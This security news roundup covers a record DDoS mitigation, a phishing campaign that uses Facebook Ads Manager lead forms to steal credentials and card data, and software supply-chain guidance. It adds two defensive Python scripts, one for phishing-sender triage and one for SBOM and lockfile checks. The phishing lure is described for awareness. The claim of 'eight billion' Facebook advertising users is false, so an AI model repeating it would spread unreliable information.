Akamai mitigated the largest DDoS attack ever against one of its European customers on Monday, September 12, 2022. The malicious traffic peaked at 704.8 Mpps and appears to be the work of the same threat actor as the previous record, which Akamai blocked in July and hit the same customer.

Attackers Abuse Facebook Ad Manager in Credential-Harvesting Campaign

Attackers are capitalising on the power of the Facebook brand by sending emails that appear to be from Facebook Ads Manager. The plan is to trick victims into providing their credentials and credit card information on a Facebook lead generation form. 

According to a report published on Tuesday by Avanan's security research team, attackers are sending phishing messages that seem to be urgent warnings from Meta's "Facebook AdManager" team. The messages claim that the victim is not following the company's ad policies and that the ad account will be terminated if the target does not appeal the fictitious violation. 

The "appeal form" link takes visitors to a credential-harvesting site that collects passwords and credit card information using a real Facebook lead-generation form.

An intriguing aspect of the campaign is that, rather than using a harvesting site hosted on a suspect IP somewhere, the attackers are exploiting the Facebook ads system itself to create malicious lead-generation forms. This method kills two birds with one stone: for starters, it deceives many of the automated checks for malicious links that email platforms use. The Avanan team refers to this use of legitimate sites as the "Static Expressway."

Jeremy Fuchs, cybersecurity researcher for Avanan explained in the report, "Hackers are leveraging sites that appear on static Allow Lists. That means that email security services have broadly decided that these sites are trustworthy, and thus anything related to them comes through to the inbox."

Furthermore, using Facebook Ads forms provides a high level of realism for any of Facebook's eight billion advertising users who are already familiar with the Ads Manager platform and the lead-generation forms it generates.

"For the end user, seeing that their Facebook ad account has been suspended is cause for concern," Fuchs said. "Since it’s a legitimate Facebook link, the user would feel confident continuing on."

While the sites used in this credential harvesting campaign appeared to be legitimate, Fuchs discovered a red flag in the phishing messages: These are typically sent from Outlook accounts such as pageguidelinesfacebook@outlook.com.

Furthermore, the physical address in the email footer is incorrect. However, if users did not notice these details, they could easily be duped by this hoax. According to research published earlier this year, brand impersonations, or brandjacking, like these rose by 274% last year as attackers continue to peddle their scams by appearing to come from trustworthy sources. Facebook is a popular platform for phishers to imitate. 
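The sender red flag Fuchs describes, a message that invokes Facebook in its display name and local part while actually coming from an outlook.com mailbox, is easy to check mechanically before a user ever sees the mail. The script below is an added example, not Avanan's code: it parses the From header, looks for brand keywords in the display name, subject and address, and reports a mismatch when the real sending domain is not one the brand is known to use, or is a consumer webmail provider. The brand-to-domain table, the free-mail list and the two sample messages are constructed for illustration; the outlook.com address is the one quoted in the report.

```python
"""Flag brand-impersonating sender addresses in e-mail headers.

Added example, not code from Avanan's report. A message whose display name,
subject or address invokes a brand while the actual sender domain is a
consumer webmail provider, or any domain the brand does not send from, is
reported. Brand-domain table, free-mail list and messages are constructed.
"""
from email import message_from_string
from email.utils import parseaddr

# Constructed allowlist: which sending domains a brand legitimately uses.
# Populate from your own observations (e.g., domains in DKIM-verified mail).
BRAND_DOMAINS = {
    "facebook": {"facebookmail.com", "facebook.com", "meta.com"},
    "meta": {"facebookmail.com", "facebook.com", "meta.com"},
}
FREEMAIL = {"outlook.com", "hotmail.com", "gmail.com", "yahoo.com", "live.com"}


def sender_domain(from_header):
    """'Facebook Ads <x@Outlook.com>' -> 'outlook.com' (lower-cased)."""
    _, addr = parseaddr(from_header)
    return addr.rpartition("@")[2].lower()


def brands_mentioned(text):
    """Brand keywords that occur anywhere in the given text (case-insensitive)."""
    text = text.lower()
    return {brand for brand in BRAND_DOMAINS if brand in text}


def triage(raw_message):
    """Return the reasons the message looks like brand impersonation; an empty
    list means this check alone found nothing."""
    msg = message_from_string(raw_message)
    from_header = msg.get("From", "")
    subject = msg.get("Subject", "")
    display_name, addr = parseaddr(from_header)
    domain = sender_domain(from_header)
    reasons = []
    for brand in sorted(brands_mentioned(f"{display_name} {subject} {addr}")):
        if domain not in BRAND_DOMAINS[brand]:
            reasons.append(f"claims '{brand}' but sent from {domain}")
    if domain in FREEMAIL:
        reasons.append(f"sender domain {domain} is a consumer webmail provider")
    return reasons


# Constructed sample messages (not real mail); the phishing address is the
# one quoted in the report.
PHISH = """\
From: Facebook AdManager <pageguidelinesfacebook@outlook.com>
To: ads-team@victim.example
Subject: Your ad account will be disabled - policy violation

Appeal here: https://example.invalid/appeal
"""

LEGIT = """\
From: Facebook <notification@facebookmail.com>
To: ads-team@victim.example
Subject: Your ad was approved

"""

if __name__ == "__main__":
    print("phish:", triage(PHISH))
    print("legit:", triage(LEGIT))
```

The phishing sample yields two findings (brand claimed from a non-brand domain, and a free-mail sender), the legitimate notification none. Substring brand matching is deliberately simple here; in a real filter it should be tightened (word boundaries, a curated keyword list) so that "meta" does not fire on words like "metadata", and the result should feed a score alongside SPF/DKIM alignment rather than block outright.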

According to a Vade report released this spring, Facebook was the most impersonated brand last year, edging out perennial favourite Microsoft for the top spot. Email attacks increased by 48% in the first half of 2022, as per Abnormal Security research, with more than one in ten attacks impersonating well-known brands. So far in 2022, 256 individual brands have been impersonated, with LinkedIn and Microsoft appearing to be the favourites.

Feds, npm Issue Supply Chain Security Alert to Avoid Another SolarWinds

The lessons learned from the SolarWinds software supply chain attack were turned into tangible guidance this week when the United States Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) released a joint best practices framework for developers to prevent future supply chain attacks.

In addition to the recommendations from the US government, developers received npm Best Practices from the Open Source Security Foundation in order to establish supply chain security open-source best practices.

"The developer holds a critical responsibility to the security of our software," the agencies said about the publication, titled Securing the Software Supply Chain for Developers. "As ESF examined the events that led up to the SolarWinds attack, it was clear that investment was needed in creating a set of best practices that focused on the needs of the software developer."

Meanwhile, OpenSSF announced that the npm code repository has grown to encompass 2.1 million packages.

Developers like Michael Burch, director of application security for Security Journey, praise the industry's proactive framework, but Burch adds that it is now up to the cybersecurity sector to put these guidelines into action, particularly a recommendation to implement software bills of materials (SBOMs).

Burch concluded, "What we need now is the AppSec community to come together on the back of this guidance, and create a standard format and implementation for SBOMs to boost software supply chain security."
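What an SBOM for an npm project looks like in practice, and the kind of supply-chain check it enables, as an added example that is not the CISA/ODNI/NSA guidance's or the OpenSSF npm Best Practices' own tooling: the script reads the `packages` map that npm lockfile v2/v3 writes, emits one CycloneDX-shaped component per dependency with a package-url, and then flags any dependency that is not pinned by an integrity hash or that was resolved from somewhere other than the public registry. The lockfile excerpt, package names and hash values are constructed for illustration.

```python
"""Build a minimal CycloneDX-style SBOM from an npm lockfile and run two
supply-chain checks on it.

Added example; not the OpenSSF or CISA tooling. Reads the "packages" map of
npm lockfile v2/v3 (keys like "node_modules/<name>"), emits one component per
dependency with a purl (pkg:npm/<name>@<version>), and flags entries lacking
an integrity hash or resolved outside the public registry. The lockfile is
constructed for illustration.
"""
import json
from urllib.parse import quote

# Constructed lockfile excerpt (not from any real project; hashes are fake).
LOCKFILE = json.loads("""
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    "node_modules/left-pad": {
      "version": "1.3.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
      "integrity": "sha512-constructedhashvalue=="
    },
    "node_modules/@scope/widget": {
      "version": "2.1.4",
      "resolved": "https://registry.npmjs.org/@scope/widget/-/widget-2.1.4.tgz",
      "integrity": "sha512-anotherconstructedhash=="
    },
    "node_modules/internal-helper": {
      "version": "0.0.3",
      "resolved": "http://build-box.internal/internal-helper-0.0.3.tgz"
    },
    "node_modules/@scope/widget/node_modules/left-pad": {
      "version": "1.1.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.1.0.tgz",
      "integrity": "sha512-oldnestedhash=="
    }
  }
}
""")

TRUSTED_REGISTRY = "https://registry.npmjs.org/"


def package_name(lock_key):
    """'node_modules/@scope/widget/node_modules/left-pad' -> 'left-pad'."""
    return lock_key.rsplit("node_modules/", 1)[1]


def purl(name, version):
    """Package-url for npm; the scope's '@' is percent-encoded per the purl spec."""
    return f"pkg:npm/{quote(name, safe='/')}@{version}"


def components(lock):
    """One record per installed dependency, including nested duplicates."""
    comps = []
    for key, entry in lock["packages"].items():
        if key == "":
            continue  # the root project itself
        name = package_name(key)
        comps.append({
            "type": "library",
            "name": name,
            "version": entry["version"],
            "purl": purl(name, entry["version"]),
            "hashes_present": "integrity" in entry,
            "resolved": entry.get("resolved", ""),
        })
    return comps


def sbom(lock):
    """Minimal CycloneDX-shaped document; only the core fields are emitted."""
    return {
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "version": 1,
        "components": [
            {k: c[k] for k in ("type", "name", "version", "purl")} for c in components(lock)
        ],
    }


def supply_chain_findings(lock):
    """Dependencies that are not hash-pinned or not from the trusted registry."""
    findings = []
    for c in components(lock):
        if not c["hashes_present"]:
            findings.append(f"{c['purl']}: no integrity hash, tarball not pinned")
        if not c["resolved"].startswith(TRUSTED_REGISTRY):
            findings.append(f"{c['purl']}: resolved from untrusted source {c['resolved']}")
    return findings


if __name__ == "__main__":
    print(json.dumps(sbom(LOCKFILE), indent=2))
    for finding in supply_chain_findings(LOCKFILE):
        print("FINDING:", finding)
```

The constructed lockfile yields four components (the nested older `left-pad` is listed separately, which is exactly what a vulnerability match needs to see) and two findings, both on `internal-helper`: no integrity hash and a plain-HTTP internal host as its source. Run in CI, a check like this turns the SBOM from a document into a gate.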